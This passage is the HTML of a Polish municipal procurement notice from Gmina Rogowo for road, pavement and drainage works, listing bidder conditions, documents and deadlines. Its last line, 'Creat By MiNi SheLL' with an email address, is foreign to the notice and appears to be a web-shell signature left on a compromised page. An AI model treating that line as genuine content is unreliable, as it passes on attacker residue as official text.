Do każdej nazwy firmy, przykładowych znaków towarowych, typów urządzeń, które zostały wymienione w specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót dodaje się lub równoważne. Za równoważne rozumie się materiały lub urządzenia o parametrach nie gorszych niż wyszczególnione w SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 45.23.32.52-0, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja tego warunku nastąpi poprzez odesłanie do odrębnych przepisów, które   wskazują na obowiązek posiadania uprawnień do wykonywania określonej działalności lub czynności. Wykazaniu spełnienia tego warunku może posłużyć odpowiedni dokument koncesji, zezwolenia lub licencji Wykonawcy (ubiegającego się                 o zamówienie publiczne - przyszła strona umowy).
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie    spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do weryfikacji spełnienia tego warunku posłużą odpowiednio wykazy wykonanych robót budowlanych. Warunek ten będzie spełniony, jeżeli Wykonawcy udokumentują, że wykonali tj. zakończyli roboty budowlane w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie              z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawca powinien udokumentować co najmniej jedną robotę budowlaną odpowiadającą rodzajowo przedmiotowi zamówienia tj. budowie, przebudowie lub remoncie drogi       z chodnikiem o nawierzchni z kostki betonowej i kanalizacji odwodnieniowej.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że  będzie posiadał co najmniej:
a)1 samochód wywrotka do 5,0 Mg,
b)1 samochód wywrotka 10-15 Mg,
c)1 koparka kołowa 0,6 m3,
d)1 koparka gąsienicowa 0,6 m3,
e)1 spycharka gąsienicowa 100 kM,
f)1 walec wibracyjny samojezdny 5 Mg,
g)1 walec statyczny samojezdny 6 Mg,
h)1 zagęszczarkę wibracyjna spalin. 70-90 m3/h,
i)1 wibrator powierzchniowy,
j)1 piła do cięcia kostki
z informacją o podstawie ich dysponowania.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek  za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia o specjalnościach min.                    w ograniczonym zakresie:
- drogowej,
-sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych      wodociągowych  i  kanalizacyjnych
wraz z aktualnym zaświadczeniem potwierdzającym członkostwo w Izbie Inżynierów Budownictwa. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik     nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty nie wymienione w ust. 1-9 niniejszego rozdziału SIWZ:
a)wypełniony i podpisany przez Wykonawcę formularz oferty Załącznik nr 1          do SIWZ;
b)projekt umowy (zaparafowany na każdej stronie) stanowiący Załącznik nr 13      do SIWZ;
c)sporządzony kosztorys ofertowy opracowany na podstawie przedmiaru robót;
d)Wykonawca prowadzący działalność gospodarczą winien do oferty dołączyć     dokument rejestrowy wykazujący do reprezentowania podmiotu, a w przypadku osób fizycznych wydruk z Centralnego Ewidencji I Informacji O Działalności Gospodarczej (CEIDIG) w Rzeczypospolitej Polskiej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)zmiany kierownika robót bądź osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; 
2)zmiany terminu zakończenia realizacji inwestycji:
a)z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych;
b)w przypadku prowadzenia badań w wykopaliskach archeologicznych;
3)zmiany obowiązującej stawki podatku VAT:
a)zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części jakiej dotyczą      te zmiany przepisów.
4)zmiany sposobu wykonania robót budowlanych na skutek zmian technologicznych spowodowanymi następującymi okolicznościami:
a)niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
c)pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
d)konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groził niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
e)odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
f)konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 4 możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://rogowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 11:00, miejsce: Urzędzie Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com